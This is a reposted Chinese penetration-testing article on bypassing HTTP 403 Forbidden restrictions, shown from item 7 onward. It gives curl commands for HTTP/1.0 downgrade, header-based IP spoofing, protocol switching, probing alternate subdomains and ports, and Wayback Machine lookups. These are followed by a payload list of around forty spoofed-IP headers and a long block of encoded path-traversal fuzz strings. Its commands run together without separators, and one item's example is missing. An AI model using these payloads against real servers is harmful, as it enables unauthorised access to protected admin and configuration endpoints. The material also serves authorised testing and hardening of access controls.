403Forbidden绕过

admin 2026-10-03 04:43:54 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文系统解析403Forbidden错误原理及绕过技术,涵盖IP封锁、权限配置不当等常见原因,重点介绍HTTP方法篡改、头部操控、路径模糊测试与编码等绕过技巧,并提供curl命令示例与BurpSuite自动化测试建议,对Web渗透测试与红队实战具有参考价值。 综合评分: 74 文章分类: 渗透测试,WEB安全,红队


403 Forbidden 绕过

原创

lys lys

绿洲安全

2026年10月2日 09:00 中国香港

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

免责声明

7. HTTP 版本降级

某些服务器对 HTTP/1.0 请求的处理方式与 HTTP/1.1 不同,通常会为了兼容性而绕过安全检查或应用较宽松的控制。

curl -http1.0 https://example.com/admincurl -http1.0 https://example.com/secretcurl -http1.0 https://example.com/configcurl -http1.0 https://example.com/dashboard

8. 使用代理或 IP 欺骗绕过

某些 403 错误是由于基于 IP 的限制而产生的。这些有时可以通过更改 IP 地址或欺骗头部来绕过。

示例:

使用代理/VPN:

proxychains curl http://example.com/private/

欺骗 IP 头部(可能对配置错误的服务器有效):

curl -H "X-Forwarded-For: 127.0.0.1" http://example.com/private/curl -H "X-Real-IP: 127.0.0.1" http://example.com/private/

9. 在 HTTP 和 HTTPS 之间切换

某些配置错误的服务器根据协议应用不同的访问控制。从 HTTPS 切换到 HTTP(或反之)有时可以绕过限制。

示例:

curl http://example.com/private/curl https://example.com/private/

10. 探索备用子域名与端口

访问限制(如 403 错误)可能仅适用于主域名,但相同的端点可能暴露在其他子域名或非标准端口上。

示例:

尝试以下变体

https://admin.example.com/adminhttps://dev.example.com/adminhttps://example.com:8080/adminhttps://example.com:8443/adminhttps://example.com:8000/admin

11. 跳过 Host 头部:

有时从 HTTP 请求中移除 Host 头部可以触发配置错误的后端行为。如果服务器或代理设置不正确,它可能将 Host 值默认为 127.0.0.1 或 localhost,实际上将请求视为内部请求。这可能会无意中授予对 403 受限端点的访问权限。

示例:

当服务器自动用受信任的内部值填充缺失的 Host 时,这个技巧就会生效,这在遗留设置或配置错误的代理中很常见。

12. 使用 Wayback Machine 访问 403 Forbidden 文件

某些现在返回 403 Forbidden 的端点过去可能是公开的。使用 Wayback Machine,你可以发现受限文件、管理面板或备份路径的旧快照,使其成为漏洞赏金猎人的宝贵侦察技术。

示例:

https://web.archive.org/web/*/https://example.com/secret-file.txt
  • https://web.archive.org/web/ — 这是互联网档案馆 Wayback Machine 的基础 URL。
  • * 告诉 Wayback Machine 显示所有可用的快照,无论日期。
  • https://example.com/secret-file.txt — 这是你想要检查过去版本的目标文件或页面。

这允许你手动查看现在被禁止的端点的旧缓存版本。

HTTP head payload

Base-Url: 127.0.0.1Client-IP: 127.0.0.1Http-Url: 127.0.0.1Proxy-Host: 127.0.0.1Proxy-Url: 127.0.0.1Real-Ip: 127.0.0.1Redirect: 127.0.0.1Referer: 127.0.0.1Referrer: 127.0.0.1Refferer: 127.0.0.1Request-Uri: 127.0.0.1Uri: 127.0.0.1Url: 127.0.0.1X-Client-IP: 127.0.0.1X-Custom-IP-Authorization: 127.0.0.1X-Forward-For: 127.0.0.1X-Forwarded-By: 127.0.0.1X-Forwarded-For-Original: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwarded-Host: 127.0.0.1X-Forwarded-Port: 443X-Forwarded-Port: 4443X-Forwarded-Port: 80X-Forwarded-Port: 8080X-Forwarded-Port: 8443X-Forwarded-Scheme: httpX-Forwarded-Scheme: httpsX-Forwarded-Server: 127.0.0.1X-Forwarded: 127.0.0.1X-Forwarder-For: 127.0.0.1X-Host: 127.0.0.1X-Http-Destinationurl: 127.0.0.1X-Http-Host-Override: 127.0.0.1X-Original-Remote-Addr: 127.0.0.1X-Original-Url: 127.0.0.1X-Originating-IP: 127.0.0.1X-Proxy-Url: 127.0.0.1X-Real-Ip: 127.0.0.1X-Remote-Addr: 127.0.0.1X-Remote-IP: 127.0.0.1X-Rewrite-Url: 127.0.0.1X-True-IP: 127.0.0.1

URL payload

##?%09%09%3b%09..%09;%20%23%23%3f%252f%252f%252f/%2e%2e%2e%2e/%2f%2f%20%23%2f%23%2f%2f%2f%3b%2f%2f%3b%2f%2f%2f%3f%2f%3f/%2f/%2f;?%2f?;%3b%3b%09%3b%2f%2e%2e%3b%2f%2e%2e%2f%2e%2e%2f%2f%3b%2f%2e.%3b%2f..%3b/%2e%2e/..%2f%2f%3b/%2e.%3b/%2f%2f../%3b/..%3b//%2f../%3f%23%3f%3f%3f.php....%00/..%00/;..%00;/..%09..%0d/..%0d/;..%0d;/..%5c/..%ff/..%ff/;..%ff;/../..;%00/..;%0d/..;%ff/..;\..;\;..\..\;.html.json//#/%20/%20#/%20%23/%23/%252e%252e%252f//%252e%252e%253b//%252e%252f//%252e%253b//%252e//%252f/%2e%2e/%2e%2e%2f//%2e%2e%3b//%2e%2e//%2e%2f//%2e%3b//%2e%3b///%2e//%2e///%2f/%3b//../..%2f/..%2f..%2f/..%2f..%2f..%2f/..//../..//../../..//../../..///../..///../..//..//../..;//.././..//../.;/..//..///..//..//..//../..//..//..;//../;//../;/.//..;%2f/..;%2f..;%2f/..;%2f..;%2f..;%2f/..;//..;/.//..;/..;//..;///..;//..//..;//..;//..;/;//..;/;/..;//.//.///.;//.;//////..//../..///..;//.///.;////..///..////../////..;///..;////..;////;//;//;///;?/;x/;x//?/?;/x/..//x/..///x/../;//x/..;//x/..;///x/..;/;//x//..//x//..;//x/;/..//x/;/..;/;;%09;%09..;%09..;;%09;;%2F..;%2f%2e%2e;%2f%2e%2e%2f%2e%2e%2f%2f;%2f%2f/../;%2f..;%2f..%2f%2e%2e%2f%2f;%2f..%2f..%2f%2f;%2f..%2f/;%2f..%2f/..%2f;%2f..%2f/../;%2f../%2f..%2f;%2f../%2f../;%2f..//..%2f;%2f..//../;%2f..///;%2f..///;;%2f..//;/;%2f..//;/;;%2f../;//;%2f../;/;%2f../;/;/;%2f../;/;/;;%2f..;///;%2f..;//;/;%2f..;/;//;%2f/%2f../;%2f//..%2f;%2f//../;%2f//..;/;%2f/;/../;%2f/;/..;/;%2f;//../;%2f;/;/..;/;/%2e%2e;/%2e%2e%2f%2f;/%2e%2e%2f/;/%2e%2e/;/%2e.;/%2f%2f../;/%2f/..%2f;/%2f/../;/.%2e;/.%2e/%2e%2e/%2f;/..;/..%2f;/..%2f%2f../;/..%2f..%2f;/..%2f/;/..%2f//;/../;/../%2f/;/../../;/../..//;/.././../;/../.;/../;/..//;/..//%2e%2e/;/..//%2f;/..//../;/..///;/../;/;/../;/./;/..;;/.;.;//%2f../;//..;//../../;///..;///../;///..//;?;x;x/;x;??#?.php?;??////%2f///%2f%2f/%2f%2f%2f%2f%2f//

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。

本文转载自:绿洲安全 lys lys《403 Forbidden 绕过》

403Forbidden绕过 网络安全文章

403Forbidden绕过

文章总结: 本文系统解析403Forbidden错误原理及绕过技术,涵盖IP封锁、权限配置不当等常见原因,重点介绍HTTP方法篡改、头部操控、路径模糊测试与编码
评论:0   参与:  0